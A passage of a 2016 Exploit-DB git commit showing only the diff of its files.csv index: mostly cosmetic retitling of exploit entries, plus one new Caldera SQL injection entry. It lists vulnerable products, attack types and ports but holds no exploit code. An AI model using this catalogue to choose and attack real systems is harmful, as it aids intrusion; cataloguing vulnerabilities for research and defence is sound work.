From 9e71d66c7f8954edd3eb0c3ae574c45bb567aa89 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sun, 17 Jan 2016 05:01:51 +0000 Subject: [PATCH] DB: 2016-01-17 4 new exploits --- files.csv | 52 +++++++++++++----------- platforms/multiple/remote/705.pl | 6 +-- platforms/php/webapps/2451.txt | 68 ++++++++++++++++---------------- platforms/php/webapps/2462.txt | 60 ++++++++++++++-------------- platforms/php/webapps/39174.txt | 7 ++++ platforms/php/webapps/39240.txt | 11 ++++++ platforms/php/webapps/39245.txt | 17 +++++--- platforms/php/webapps/39248.txt | 11 ++++++ platforms/php/webapps/673.cgi | 6 +-- platforms/windows/dos/39242.py | 27 +++++++++++++ 10 files changed, 166 insertions(+), 99 deletions(-) create mode 100755 platforms/php/webapps/39174.txt create mode 100755 platforms/php/webapps/39240.txt create mode 100755 platforms/php/webapps/39248.txt create mode 100755 platforms/windows/dos/39242.py diff --git a/files.csv b/files.csv index 9151c764c..b5095e169 100755 --- a/files.csv +++ b/files.csv @@ -345,7 +345,7 @@ id,file,description,date,author,platform,type,port 368,platforms/windows/local/368.c,"Microsoft Windows XP Task Scheduler (.job) Universal Exploit (MS04-022)",2004-07-31,houseofdabus,windows,local,0 369,platforms/linux/local/369.pl,"SoX - Local Buffer Overflow Exploit",2004-08-01,"Serkan Akpolat",linux,local,0 370,platforms/linux/dos/370.c,"Citadel/UX Remote Denial of Service Exploit (PoC)",2004-08-02,CoKi,linux,dos,0 -371,platforms/linux/dos/371.c,"Apache HTTPd - Arbitrary Long HTTP Headers DoS (c Version)",2004-08-02,N/A,linux,dos,0 +371,platforms/linux/dos/371.c,"Apache HTTPd - Arbitrary Long HTTP Headers DoS (C)",2004-08-02,N/A,linux,dos,0 372,platforms/linux/remote/372.c,"OpenFTPD <= 0.30.2 - Remote Exploit",2004-08-03,Andi,linux,remote,21 373,platforms/linux/remote/373.c,"OpenFTPD <= 0.30.1 (message system) Remote Shell Exploit",2004-08-04,infamous41md,linux,remote,21 374,platforms/linux/local/374.c,"SoX - (.wav) Local Buffer Overflow Exploiter",2004-08-04,Rave,linux,local,0 @@ -520,7 +520,7 @@ id,file,description,date,author,platform,type,port 670,platforms/windows/remote/670.c,"Mercury Mail 4.01 - (Pegasus) IMAP Buffer Overflow (2) (c code)",2004-12-01,JohnH,windows,remote,143 671,platforms/windows/dos/671.c,"Neverwinter Nights special Fake Players Denial of Service Exploit",2004-12-01,"Luigi Auriemma",windows,dos,0 672,platforms/windows/dos/672.c,"Kreed <= 1.05 Format String and Denial of Service Exploit",2004-12-02,"Luigi Auriemma",windows,dos,0 -673,platforms/php/webapps/673.cgi,"phpBB <= 2.0.10 - Remote Command Execution Exploit (cgi version)",2004-12-03,ZzagorR,php,webapps,0 +673,platforms/php/webapps/673.cgi,"phpBB <= 2.0.10 - Remote Command Execution Exploit (CGI)",2004-12-03,ZzagorR,php,webapps,0 675,platforms/windows/remote/675.txt,"Hosting Controller <= 0.6.1 Hotfix 1.4 - Directory Browsing Vulnerability",2004-12-05,Mouse,windows,remote,0 676,platforms/php/webapps/676.c,"phpBB 1.0.0 & 2.0.10 - admin_cash.php Remote Exploit",2004-12-05,evilrabbi,php,webapps,0 677,platforms/windows/dos/677.txt,"GetRight <= 5.2a - Skin File (.grs) Buffer Overflow Exploit",2004-12-06,ATmaCA,windows,dos,0 @@ -549,7 +549,7 @@ id,file,description,date,author,platform,type,port 702,platforms/php/webapps/702.pl,"phpBB highlight Arbitrary File Upload (Santy.A)",2004-12-22,N/A,php,webapps,0 703,platforms/php/webapps/703.pl,"phpMyChat 0.14.5 - Remote Improper File Permissions Exploit",2004-12-22,sysbug,php,webapps,0 704,platforms/php/webapps/704.pl,"e107 include() Remote Exploit",2004-12-22,sysbug,php,webapps,80 -705,platforms/multiple/remote/705.pl,"Webmin BruteForce and Command Execution Exploit",2004-12-22,Di42lo,multiple,remote,10000 +705,platforms/multiple/remote/705.pl,"Webmin - BruteForce and Command Execution Exploit",2004-12-22,Di42lo,multiple,remote,10000 711,platforms/windows/remote/711.c,"CrystalFTP Pro 2.8 - Remote Buffer Overflow Exploit",2005-04-24,cybertronic,windows,remote,21 712,platforms/linux/remote/712.c,"SHOUTcast DNAS/Linux 1.9.4 - Format String Remote Exploit",2004-12-23,pucik,linux,remote,8000 713,platforms/solaris/local/713.c,"Solaris 7/8/9 CDE LibDTHelp Local Buffer Overflow Exploit",2004-12-24,"Marco Ivaldi",solaris,local,0 @@ -578,9 +578,9 @@ id,file,description,date,author,platform,type,port 745,platforms/multiple/remote/745.cgi,"Webmin 1.5 - Web Brute Force (cgi-version)",2005-01-08,ZzagorR,multiple,remote,10000 746,platforms/multiple/remote/746.pl,"Webmin 1.5 - BruteForce + Command Execution",2005-01-08,ZzagorR,multiple,remote,10000 749,platforms/windows/local/749.cpp,"Microsoft Windows - Improper Token Validation Local Exploit",2005-01-11,"Cesar Cerrudo",windows,local,0 -750,platforms/windows/remote/750.c,"Veritas Backup Exec Agent 8.x/9.x - Browser Overflow (c Version)",2005-01-11,class101,windows,remote,6101 +750,platforms/windows/remote/750.c,"Veritas Backup Exec Agent 8.x/9.x - Browser Overflow (C)",2005-01-11,class101,windows,remote,6101 753,platforms/windows/remote/753.html,"Microsoft Internet Explorer .ANI Remote Stack Overflow (0.2)",2005-01-12,Skylined,windows,remote,0 -754,platforms/php/webapps/754.pl,"ITA Forum <= 1.49 SQL Injection Exploit",2005-01-13,RusH,php,webapps,0 +754,platforms/php/webapps/754.pl,"ITA Forum <= 1.49 - SQL Injection Exploit",2005-01-13,RusH,php,webapps,0 755,platforms/windows/dos/755.c,"Breed <= patch #1 - zero-length Remote Crash Exploit",2005-01-13,"Luigi Auriemma",windows,dos,7649 756,platforms/linux/local/756.c,"Exim <= 4.41 dns_build_reverse Local Exploit PoC",2005-01-15,"Rafael Carrasco",linux,local,0 758,platforms/osx/remote/758.c,"Apple iTunes Playlist Local Parsing Buffer Overflow Exploit",2005-01-16,nemo,osx,remote,0 @@ -880,7 +880,7 @@ id,file,description,date,author,platform,type,port 1069,platforms/php/webapps/1069.php,"UBB Threads < 6.5.2 Beta (mailthread.php) SQL Injection Exploit",2005-06-25,mh_p0rtal,php,webapps,0 1070,platforms/asp/webapps/1070.pl,"ASPNuke <= 0.80 (article.asp) SQL Injection Exploit",2005-06-27,mh_p0rtal,asp,webapps,0 1071,platforms/asp/webapps/1071.pl,"ASPNuke <= 0.80 (comment_post.asp) SQL Injection Exploit",2005-06-27,"Alberto Trivero",asp,webapps,0 -1072,platforms/multiple/dos/1072.cpp,"Stream / Raped - Denial of Service Attack (Windows Version)",2005-06-27,"Marco Del Percio",multiple,dos,0 +1072,platforms/multiple/dos/1072.cpp,"Stream / Raped - Denial of Service Attack (Windows)",2005-06-27,"Marco Del Percio",multiple,dos,0 1073,platforms/solaris/local/1073.c,"Solaris 9 / 10 ld.so Local Root Exploit (1)",2005-06-28,"Przemyslaw Frasunek",solaris,local,0 1074,platforms/solaris/local/1074.c,"Solaris 9 / 10 - ld.so Local Root Exploit (2)",2005-06-28,"Przemyslaw Frasunek",solaris,local,0 1075,platforms/windows/remote/1075.c,"Microsoft Windows Message Queuing BoF Universal Exploit (MS05-017) (v.0.3)",2005-06-29,houseofdabus,windows,remote,2103 @@ -1502,7 +1502,7 @@ id,file,description,date,author,platform,type,port 1788,platforms/windows/remote/1788.pm,"PuTTy.exe <= 0.53 - (validation) Remote Buffer Overflow Exploit (meta)",2006-05-15,y0,windows,remote,0 1789,platforms/php/webapps/1789.txt,"TR Newsportal <= 0.36tr1 (poll.php) Remote File Inclusion Vulnerability",2006-05-15,Kacper,php,webapps,0 1790,platforms/php/webapps/1790.txt,"Squirrelcart <= 2.2.0 (cart_content.php) Remote Inclusion Vulnerability",2006-05-15,OLiBekaS,php,webapps,0 -1791,platforms/multiple/remote/1791.patch,"RealVNC 4.1.0 - 4.1.1 - VNC Null Authentication Bypass (Patch EXE)",2006-05-16,redsand,multiple,remote,5900 +1791,platforms/multiple/remote/1791.patch,"RealVNC 4.1.0 - 4.1.1 - VNC Null Authentication Bypass (Patched EXE)",2006-05-16,redsand,multiple,remote,5900 1792,platforms/windows/dos/1792.txt,"GNUnet <= 0.7.0d - (Empty UDP Packet) Remote Denial of Service Exploit",2006-05-15,"Luigi Auriemma",windows,dos,0 1793,platforms/php/webapps/1793.pl,"DeluxeBB <= 1.06 (name) Remote SQL Injection Exploit (mq=off)",2006-05-15,KingOfSka,php,webapps,0 1794,platforms/multiple/remote/1794.pm,"RealVNC 4.1.0 - 4.1.1 - (Null Authentication) Auth Bypass Exploit (meta)",2006-05-15,"H D Moore",multiple,remote,5900 @@ -1601,7 +1601,7 @@ id,file,description,date,author,platform,type,port 1890,platforms/php/webapps/1890.txt,"cms-bandits 2.5 (spaw_root) Remote File Include Vulnerabilities",2006-06-08,"Federico Fazzi",php,webapps,0 1891,platforms/php/webapps/1891.txt,"Enterprise Payroll Systems <= 1.1 (footer) Remote Include Vulnerability",2006-06-08,Kacper,php,webapps,0 1892,platforms/php/webapps/1892.pl,"Guestex Guestbook 1.00 (email) Remote Code Execution Exploit",2006-06-08,K-sPecial,php,webapps,0 -1893,platforms/asp/webapps/1893.txt,"MailEnable Enterprise <= 2.0 - (ASP Version) Multiple Vulnerabilities",2006-06-09,"Soroush Dalili",asp,webapps,0 +1893,platforms/asp/webapps/1893.txt,"MailEnable Enterprise <= 2.0 - (ASP) Multiple Vulnerabilities",2006-06-09,"Soroush Dalili",asp,webapps,0 1894,platforms/linux/dos/1894.py,"0verkill 0.16 - (ASCII-ART Game) Remote Integer Overflow Crash Exploit",2006-06-09,"Federico Fazzi",linux,dos,0 1895,platforms/php/webapps/1895.txt,"empris <= r20020923 (phormationdir) Remote Include Vulnerability",2006-06-10,Kacper,php,webapps,0 1896,platforms/php/webapps/1896.txt,"aePartner <= 0.8.3 - (dir[data]) Remote Include Vulnerability",2006-06-10,Kacper,php,webapps,0 @@ -1703,7 +1703,7 @@ id,file,description,date,author,platform,type,port 1994,platforms/php/webapps/1994.txt,"SimpleBoard Mambo Component <= 1.1.0 - Remote Include Vulnerability",2006-07-08,h4ntu,php,webapps,0 1995,platforms/php/webapps/1995.txt,"com_forum Mambo Component <= 1.2.4RC3 - Remote Include Vulnerability",2006-07-08,h4ntu,php,webapps,0 1996,platforms/php/webapps/1996.txt,"Sabdrimer PRO <= 2.2.4 (pluginpath) Remote File Include Vulnerability",2006-07-09,A.nosrati,php,webapps,0 -1997,platforms/multiple/remote/1997.php,"Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure Exploit",2006-07-09,joffer,multiple,remote,10000 +1997,platforms/multiple/remote/1997.php,"Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure Exploit (PHP)",2006-07-09,joffer,multiple,remote,10000 1998,platforms/php/webapps/1998.pl,"Ottoman CMS <= 1.1.3 (default_path) Remote File Inclusion Exploit",2006-07-09,"Jacek Wlodarczyk",php,webapps,0 1999,platforms/windows/local/1999.pl,"Microsoft Word 2000/2003 Hlink Local Buffer Overflow Exploit PoC",2006-07-09,"SYS 49152",windows,local,0 2000,platforms/hardware/dos/2000.pl,"SIPfoundry sipXtapi (CSeq) Remote Buffer Overflow Exploit PoC",2006-07-10,"Michael Thumann",hardware,dos,0 @@ -1723,7 +1723,7 @@ id,file,description,date,author,platform,type,port 2014,platforms/windows/remote/2014.pl,"Winlpd 1.2 Build 1076 - Remote Buffer Overflow Exploit",2006-07-15,"Pablo Isola",windows,remote,515 2015,platforms/linux/local/2015.py,"Rocks Clusters <= 4.1 - (umount-loop) Local Root Exploit",2006-07-15,"Xavier de Leon",linux,local,0 2016,platforms/linux/local/2016.sh,"Rocks Clusters <= 4.1 (mount-loop) Local Root Exploit",2006-07-15,"Xavier de Leon",linux,local,0 -2017,platforms/multiple/remote/2017.pl,"Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure Exploit (perl)",2006-07-15,UmZ,multiple,remote,10000 +2017,platforms/multiple/remote/2017.pl,"Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure Exploit (Perl)",2006-07-15,UmZ,multiple,remote,10000 2018,platforms/php/webapps/2018.txt,"FlushCMS <= 1.0.0-pre2 (class.rich.php) Remote Inclusion Vulnerability",2006-07-16,igi,php,webapps,0 2019,platforms/php/webapps/2019.txt,"mail2forum phpBB Mod <= 1.2 (m2f_root_path) Remote Include Vulns",2006-07-17,OLiBekaS,php,webapps,0 2020,platforms/php/webapps/2020.txt,"com_videodb Mambo Component <= 0.3en Remote Include Vulnerability",2006-07-17,h4ntu,php,webapps,0 @@ -1820,7 +1820,7 @@ id,file,description,date,author,platform,type,port 2121,platforms/php/webapps/2121.txt,"Torbstoff News 4 (pfad) Remote File Inclusion Vulnerability",2006-08-07,SHiKaA,php,webapps,0 2122,platforms/php/webapps/2122.txt,"ME Download System <= 1.3 (header.php) Remote Inclusion Vulnerability",2006-08-07,"Philipp Niedziela",php,webapps,0 2123,platforms/php/webapps/2123.txt,"SQLiteWebAdmin 0.1 (tpl.inc.php) Remote Include Vulnerability",2006-08-07,SirDarckCat,php,webapps,0 -2124,platforms/windows/dos/2124.php,"XChat <= 2.6.7 - (Windows Version) Remote Denial of Service Exploit (PHP)",2006-08-07,ratboy,windows,dos,0 +2124,platforms/windows/dos/2124.php,"XChat <= 2.6.7 - (Windows) Remote Denial of Service Exploit (PHP)",2006-08-07,ratboy,windows,dos,0 2125,platforms/php/webapps/2125.txt,"Joomla JD-Wiki Component <= 1.0.2 - Remote Include Vulnerability",2006-08-07,jank0,php,webapps,0 2127,platforms/php/webapps/2127.txt,"Modernbill <= 1.6 (config.php) Remote File Include Vulnerability",2006-08-07,Solpot,php,webapps,0 2128,platforms/php/webapps/2128.txt,"SAPID CMS <= 1.2.3.05 (root_path) Remote File Include Vulnerabilities",2006-08-07,Kacper,php,webapps,0 @@ -1842,7 +1842,7 @@ id,file,description,date,author,platform,type,port 2144,platforms/linux/local/2144.sh,"liblesstif <= 2-0.93.94-4mdk (DEBUG_FILE) Local Root Exploit",2006-08-08,"Karol Wiesek",linux,local,0 2145,platforms/hardware/remote/2145.txt,"Barracuda Spam Firewall <= 3.3.03.053 - Remote Code Execution (extra)",2006-08-08,PATz,hardware,remote,0 2146,platforms/php/webapps/2146.txt,"docpile:we <= 0.2.2 (INIT_PATH) Remote File Inclusion Vulnerabilities",2006-08-08,"Mehmet Ince",php,webapps,0 -2147,platforms/windows/dos/2147.pl,"XChat <= 2.6.7 - (Windows version) Remote Denial of Service Exploit (Perl)",2006-08-08,Elo,windows,dos,0 +2147,platforms/windows/dos/2147.pl,"XChat <= 2.6.7 - (Windows) Remote Denial of Service Exploit (Perl)",2006-08-08,Elo,windows,dos,0 2148,platforms/php/webapps/2148.txt,"phNNTP <= 1.3 (article-raw.php) Remote File Include Vulnerability",2006-08-08,Drago84,php,webapps,0 2149,platforms/php/webapps/2149.txt,"Hitweb <= 4.2.1 (REP_INC) Remote File Include Vulnerability",2006-08-08,Drago84,php,webapps,0 2150,platforms/asp/webapps/2150.txt,"CLUB-Nuke [XP] 2.0 LCID 2048 (Turkish Version) - SQL Injection",2006-08-08,ASIANEAGLE,asp,webapps,0 @@ -2144,7 +2144,7 @@ id,file,description,date,author,platform,type,port 2448,platforms/windows/remote/2448.html,"Microsoft Internet Explorer WebViewFolderIcon setSlice() Exploit (html)",2006-09-28,jamikazu,windows,remote,0 2449,platforms/php/webapps/2449.txt,"Les Visiteurs (Visitors) <= 2.0 - (config.inc.php) File Include Vulnerability",2006-09-28,D_7J,php,webapps,0 2450,platforms/php/webapps/2450.txt,"TagIt! Tagboard <= 2.1.b b2 (index.php) Remote File Include Vulnerability",2006-09-28,Kernel-32,php,webapps,0 -2451,platforms/php/webapps/2451.txt,"phpMyWebmin 1.0 (window.php) Remote File Include Vulnerability",2006-09-28,Kernel-32,php,webapps,0 +2451,platforms/php/webapps/2451.txt,"phpMyWebmin 1.0 - (window.php) Remote File Include Vulnerability",2006-09-28,Kernel-32,php,webapps,0 2452,platforms/php/webapps/2452.txt,"phpSecurePages <= 0.28b (secure.php) Remote File Include Vulnerability",2006-09-28,D_7J,php,webapps,0 2453,platforms/php/webapps/2453.txt,"phpBB XS <= 0.58a (phpbb_root_path) Remote File Include Vulnerability",2006-09-28,"Mehmet Ince",php,webapps,0 2454,platforms/php/webapps/2454.txt,"PowerPortal 1.3a (index.php) Remote File Include Vulnerability",2006-09-29,v1per-haCker,php,webapps,0 @@ -2155,7 +2155,7 @@ id,file,description,date,author,platform,type,port 2459,platforms/php/webapps/2459.txt,"Forum82 <= 2.5.2b - (repertorylevel) Multiple File Include Vulnerabilities",2006-09-29,"Silahsiz Kuvvetler",php,webapps,0 2460,platforms/windows/remote/2460.c,"Microsoft Internet Explorer WebViewFolderIcon setSlice() Exploit (c)",2006-09-29,LukeHack,windows,remote,0 2461,platforms/php/webapps/2461.txt,"VAMP Webmail <= 2.0beta1 (yesno.phtml) Remote Include Vulnerability",2006-09-30,Drago84,php,webapps,0 -2462,platforms/php/webapps/2462.txt,"phpMyWebmin <= 1.0 (target) Remote File Include Vulnerabilities",2006-09-30,"Mehmet Ince",php,webapps,0 +2462,platforms/php/webapps/2462.txt,"phpMyWebmin <= 1.0 - (target) Remote File Include Vulnerabilities",2006-09-30,"Mehmet Ince",php,webapps,0 2463,platforms/osx/local/2463.c,"Mac OS X <= 10.4.7 Mach Exception Handling Local Root Exploit",2006-09-30,xmath,osx,local,0 2464,platforms/osx/local/2464.pl,"Mac OS X <= 10.4.7 - Mach Exception Handling Local Exploit (10.3.x 0day)",2006-09-30,"Kevin Finisterre",osx,local,0 2465,platforms/php/webapps/2465.php,"BasiliX 1.1.1 (BSX_LIBDIR) Remote File Include Exploit",2006-10-01,Kacper,php,webapps,0 @@ -3087,7 +3087,7 @@ id,file,description,date,author,platform,type,port 3419,platforms/windows/dos/3419.txt,"Microsoft Windows - (.doc) Malformed Pointers Denial of Service Exploit",2007-03-06,Marsu,windows,dos,0 3420,platforms/windows/remote/3420.html,"WinZip <= 10.0.7245 - FileView ActiveX Buffer Overflow Exploit (2)",2007-03-06,prdelka,windows,remote,0 3421,platforms/windows/dos/3421.html,"Macromedia 10.1.4.20 - SwDir.dll Internet Explorer Stack Overflow DoS",2007-03-07,shinnai,windows,dos,0 -3422,platforms/windows/remote/3422.pl,"Winamp <= 5.12 - (.pls) Remote Buffer Overflow Exploit (Perl Version)",2007-03-07,"Umesh Wanve",windows,remote,0 +3422,platforms/windows/remote/3422.pl,"Winamp <= 5.12 - (.pls) Remote Buffer Overflow Exploit (Perl)",2007-03-07,"Umesh Wanve",windows,remote,0 3423,platforms/php/webapps/3423.txt,"PHP-Nuke Module PostGuestbook 0.6.1 (tpl_pgb_moddir) RFI Vulnerability",2007-03-07,GoLd_M,php,webapps,0 3424,platforms/multiple/local/3424.php,"PHP <= 5.2.1 substr_compare() Information Leak Exploit",2007-03-07,"Stefan Esser",multiple,local,0 3425,platforms/multiple/remote/3425.txt,"mod_security <= 2.1.0 (ASCIIZ byte) POST Rules Bypass Vulnerability",2007-03-07,"Stefan Esser",multiple,remote,0 @@ -15329,7 +15329,7 @@ id,file,description,date,author,platform,type,port 17645,platforms/hardware/remote/17645.py,"iphone/ipad phone drive 1.1.1 - Directory Traversal",2011-08-09,"Khashayar Fereidani",hardware,remote,0 17646,platforms/php/webapps/17646.txt,"TNR Enhanced Joomla Search <= SQL Injection Vulnerability",2011-08-09,NoGe,php,webapps,0 17647,platforms/windows/local/17647.rb,"A-PDF All to MP3 2.3.0 - Universal DEP Bypass Exploit",2011-08-10,"C4SS!0 G0M3S",windows,local,0 -17648,platforms/linux/remote/17648.sh,"HP Data Protector - Remote Root Shell (Linux Version)",2011-08-10,SZ,linux,remote,0 +17648,platforms/linux/remote/17648.sh,"HP Data Protector - Remote Root Shell (Linux)",2011-08-10,SZ,linux,remote,0 17649,platforms/windows/remote/17649.py,"BisonFTP Server <= 3.5 - Remote Buffer Overflow Exploit",2011-08-10,localh0t,windows,remote,0 17650,platforms/windows/remote/17650.rb,"Mozilla Firefox 3.6.16 mChannel use after free Vulnerability",2011-08-10,metasploit,windows,remote,0 17653,platforms/cgi/webapps/17653.txt,"Adobe RoboHelp 9 DOM Cross-Site Scripting",2011-08-11,"Roberto Suggi Liverani",cgi,webapps,0 @@ -17271,9 +17271,9 @@ id,file,description,date,author,platform,type,port 19913,platforms/cgi/remote/19913.txt,"George Burgyan CGI Counter 4.0.2/4.0.7 Input Validation Vulnerability",2000-05-15,"Howard M. Kash III",cgi,remote,0 19914,platforms/windows/remote/19914.txt,"Seattle Lab Software Emurl 2.0 Email Account Access Vulnerability",2000-05-15,"Pierre Benoit",windows,remote,0 19915,platforms/linux/local/19915.txt,"KDE 1.1/1.1.1/1.2/2.0 kscd SHELL Environmental Variable Vulnerability",2000-05-16,Sebastian,linux,local,0 -19916,platforms/multiple/remote/19916.c,"Stake AntiSniff 1.0.1/Researchers Version 1.0 - DNS Overflow Vulnerability (1)",2000-05-16,"Hugo Breton",multiple,remote,0 -19917,platforms/multiple/remote/19917.c,"Stake AntiSniff 1.0.1/Researchers Version 1.0 - DNS Overflow Vulnerability (2)",2000-05-16,L0pht,multiple,remote,0 -19918,platforms/multiple/remote/19918.c,"Stake AntiSniff 1.0.1/Researchers Version 1.0 - DNS Overflow Vulnerability (3)",2000-05-16,L0pht,multiple,remote,0 +19916,platforms/multiple/remote/19916.c,"Stake AntiSniff 1.0.1/Researchers 1.0 - DNS Overflow Vulnerability (1)",2000-05-16,"Hugo Breton",multiple,remote,0 +19917,platforms/multiple/remote/19917.c,"Stake AntiSniff 1.0.1/Researchers 1.0 - DNS Overflow Vulnerability (2)",2000-05-16,L0pht,multiple,remote,0 +19918,platforms/multiple/remote/19918.c,"Stake AntiSniff 1.0.1/Researchers 1.0 - DNS Overflow Vulnerability (3)",2000-05-16,L0pht,multiple,remote,0 19919,platforms/hardware/dos/19919.c,"Cisco 7xx Series Router - DoS Vulnerability",1999-03-11,Tiz.Telesup,hardware,dos,0 19920,platforms/multiple/dos/19920.c,"Computalynx CProxy Server 3.3 SP2 - Buffer Overflow DoS Vulnerability",2000-05-16,"HaCk-13 TeaM",multiple,dos,0 19921,platforms/cgi/remote/19921.txt,"Matt Kruse Calendar Script 2.2 - Arbitrary Command Execution",2000-05-16,suid,cgi,remote,0 @@ -18626,7 +18626,7 @@ id,file,description,date,author,platform,type,port 21345,platforms/unix/dos/21345.txt,"Qualcomm QPopper 4.0.x - Remote Denial of Service Vulnerability",2002-03-15,"Jonas Frey",unix,dos,0 21346,platforms/windows/dos/21346.html,"Microsoft Internet Explorer 5/6_Mozilla 0.8/0.9.x_Opera 5/6 JavaScript Interpreter Denial of Service Vulnerability",2002-03-19,"Patrik Birgersson",windows,dos,0 21347,platforms/php/local/21347.php,"PHP 3.0.x/4.x Move_Uploaded_File Open_Basedir Circumvention Vulnerability",2002-03-17,Tozz,php,local,0 -21348,platforms/linux/local/21348.txt,"Webmin 0.x Script Code Input Validation Vulnerability",2002-03-20,prophecy,linux,local,0 +21348,platforms/linux/local/21348.txt,"Webmin 0.x - Script Code Input Validation Vulnerability",2002-03-20,prophecy,linux,local,0 21349,platforms/php/webapps/21349.txt,"PHP Nuke 5.x Error Message Web Root Disclosure Vulnerability",2002-03-21,godminus,php,webapps,0 21350,platforms/windows/remote/21350.pl,"Apache Win32 1.3.x/2.0.x Batch File Remote Command Execution Vulnerability",2002-03-21,SPAX,windows,remote,0 21351,platforms/windows/local/21351.pl,"WorkforceROI Xpede 4.1/7.0 Weak Password Encryption Vulnerability",2002-03-22,c3rb3r,windows,local,0 @@ -19124,7 +19124,7 @@ id,file,description,date,author,platform,type,port 21848,platforms/linux/local/21848.rb,"Linux udev - Netlink Local Privilege Escalation",2012-10-10,metasploit,linux,local,0 21849,platforms/unix/remote/21849.rb,"ZEN Load Balancer Filelog Command Execution",2012-10-10,metasploit,unix,remote,444 21850,platforms/linux/remote/21850.rb,"Samba SetInformationPolicy AuditEventsInfo Heap Overflow",2012-10-10,metasploit,linux,remote,0 -21851,platforms/unix/remote/21851.rb,"Webmin /file/show.cgi Remote Command Execution",2012-10-10,metasploit,unix,remote,10000 +21851,platforms/unix/remote/21851.rb,"Webmin 1.580 - /file/show.cgi Remote Command Execution",2012-10-10,metasploit,unix,remote,10000 21852,platforms/unix/remote/21852.rb,"QNX QCONN Remote Command Execution Vulnerability",2012-10-10,metasploit,unix,remote,0 21853,platforms/unix/remote/21853.txt,"Apache Tomcat 3/4 - DefaultServlet File Disclosure Vulnerability",2002-09-24,"Rossen Raykov",unix,remote,0 21854,platforms/linux/dos/21854.c,"Apache 2.0.39/40 Oversized STDERR Buffer Denial of Service Vulnerability",2002-09-24,"K.C. Wong",linux,dos,0 @@ -19531,7 +19531,7 @@ id,file,description,date,author,platform,type,port 22272,platforms/multiple/local/22272.pl,"Perl2Exe 1.0 9/5.0 2/6.0 Code Obfuscation Weakness",2002-02-22,"Simon Cozens",multiple,local,0 22273,platforms/linux/dos/22273.c,"Zlib 1.1.4 Compression Library gzprintf() Buffer Overrun Vulnerability (1)",2003-02-23,"Richard Kettlewel",linux,dos,0 22274,platforms/linux/remote/22274.c,"Zlib 1.1.4 Compression Library gzprintf() Buffer Overrun Vulnerability (2)",2003-02-23,CrZ,linux,remote,0 -22275,platforms/linux/remote/22275.pl,"Webmin 0.9x_Usermin 0.9x/1.0 Session ID Spoofing Unauthenticated Access Vulnerability",2003-02-20,"Carl Livitt",linux,remote,0 +22275,platforms/linux/remote/22275.pl,"Webmin 0.9x_Usermin 0.9x/1.0 - Session ID Spoofing Unauthenticated Access Vulnerability",2003-02-20,"Carl Livitt",linux,remote,0 22276,platforms/php/webapps/22276.txt,"Nuked-Klan 1.3 - Multiple Cross-Site Scripting Vulnerabilities",2003-02-23,"gregory Le Bras",php,webapps,0 22277,platforms/php/webapps/22277.txt,"Nuked-Klan 1.3 - Remote Information Disclosure Vulnerability",2003-02-23,"gregory Le Bras",php,webapps,0 22278,platforms/linux/remote/22278.pl,"moxftp 2.2 Banner Parsing Buffer Overflow Vulnerability",2003-02-24,"Knud Erik Hojgaard",linux,remote,0 @@ -20755,7 +20755,7 @@ id,file,description,date,author,platform,type,port 23532,platforms/windows/remote/23532.txt,"Hand-Crafted Software FreeProxy 3.5/3.6 - FreeWeb Directory Traversal Vulnerability",2004-01-09,badpack3t,windows,remote,0 23533,platforms/windows/remote/23533.txt,"Accipiter DirectServer 6.0 - Remote File Disclosure Vulnerability",2004-01-09,"Mark Bassett",windows,remote,0 23534,platforms/windows/dos/23534.txt,"Hand-Crafted Software FreeProxy 3.5/3.6 - FreeWeb CreateFile Function Denial of Service Vulnerability",2004-01-09,badpack3t,windows,dos,0 -23535,platforms/cgi/webapps/23535.txt,"DansGuardian Webmin Module 0.x Edit.CGI Remote Directory Traversal Vulnerability",2004-01-10,FIST,cgi,webapps,0 +23535,platforms/cgi/webapps/23535.txt,"DansGuardian Webmin Module 0.x - Edit.CGI Remote Directory Traversal Vulnerability",2004-01-10,FIST,cgi,webapps,0 23536,platforms/php/webapps/23536.txt,"Andy's PHP Projects Man Page Lookup Script Information Disclosure Vulnerability",2004-01-10,"Cabezon Aurelien",php,webapps,0 23537,platforms/php/webapps/23537.txt,"VisualShapers EZContents 1.4/2.0 Module.PHP Remote Command Execution Vulnerability",2004-01-10,"Zero X",php,webapps,0 23538,platforms/windows/dos/23538.txt,"LionMax Software WWW File Share Pro 2.4/2.6 - Remote Denial of Service Vulnerability",2004-01-12,dr_insane,windows,dos,0 @@ -21734,7 +21734,7 @@ id,file,description,date,author,platform,type,port 24571,platforms/windows/remote/24571.html,"Nullsoft Winamp 2.x/3.x/5.0.x - ActiveX Control Remote Buffer Overflow Vulnerability",2004-09-03,celebrityhacker,windows,remote,0 24572,platforms/windows/remote/24572.pl,"Ipswitch WhatsUp Gold 7.0/8.0 Notification Instance Name Remote Buffer Overflow Vulnerability",2004-09-03,anonymous,windows,remote,0 24573,platforms/multiple/webapps/24573.txt,"Keene Digital Media Server 1.0.2 - Cross-Site Scripting Vulnerabilities",2004-09-04,dr_insane,multiple,webapps,0 -24574,platforms/cgi/webapps/24574.txt,"Webmin 1.x HTML Email Command Execution Vulnerability",2004-09-07,"Keigo Yamazaki",cgi,webapps,0 +24574,platforms/cgi/webapps/24574.txt,"Webmin 1.x - HTML Email Command Execution Vulnerability",2004-09-07,"Keigo Yamazaki",cgi,webapps,0 24575,platforms/php/webapps/24575.txt,"PSNews 1.1 No Parameter Cross-Site Scripting Vulnerability",2004-09-05,"Michal Blaszczak",php,webapps,0 24576,platforms/cgi/webapps/24576.txt,"UtilMind Solutions Site News 1.1 - Authentication Bypass Vulnerability",2004-09-07,anonymous,cgi,webapps,0 24720,platforms/windows/remote/24720.txt,"Microsoft Internet Explorer 6.0 IFRAME Status Bar URI Obfuscation Weakness",2004-11-02,"Benjamin Tobias Franz",windows,remote,0 @@ -35426,6 +35426,7 @@ id,file,description,date,author,platform,type,port 39171,platforms/php/webapps/39171.txt,"PHPIPAM 1.1.010 - Multiple Vulnerabilities",2016-01-05,"Mickael Dorigny",php,webapps,0 39172,platforms/php/webapps/39172.txt,"PrestaShop getSimilarManufacturer.php id_manufacturer Parameter SQL Injection",2014-05-05,indoushka,php,webapps,0 39173,platforms/php/webapps/39173.txt,"Caldera /costview2/jobs.php tr Parameter SQL Injection",2014-05-07,"Thomas Fischer",php,webapps,0 +39174,platforms/php/webapps/39174.txt,"Caldera /costview2/printers.php tr Parameter SQL Injection",2014-05-07,"Thomas Fischer",php,webapps,0 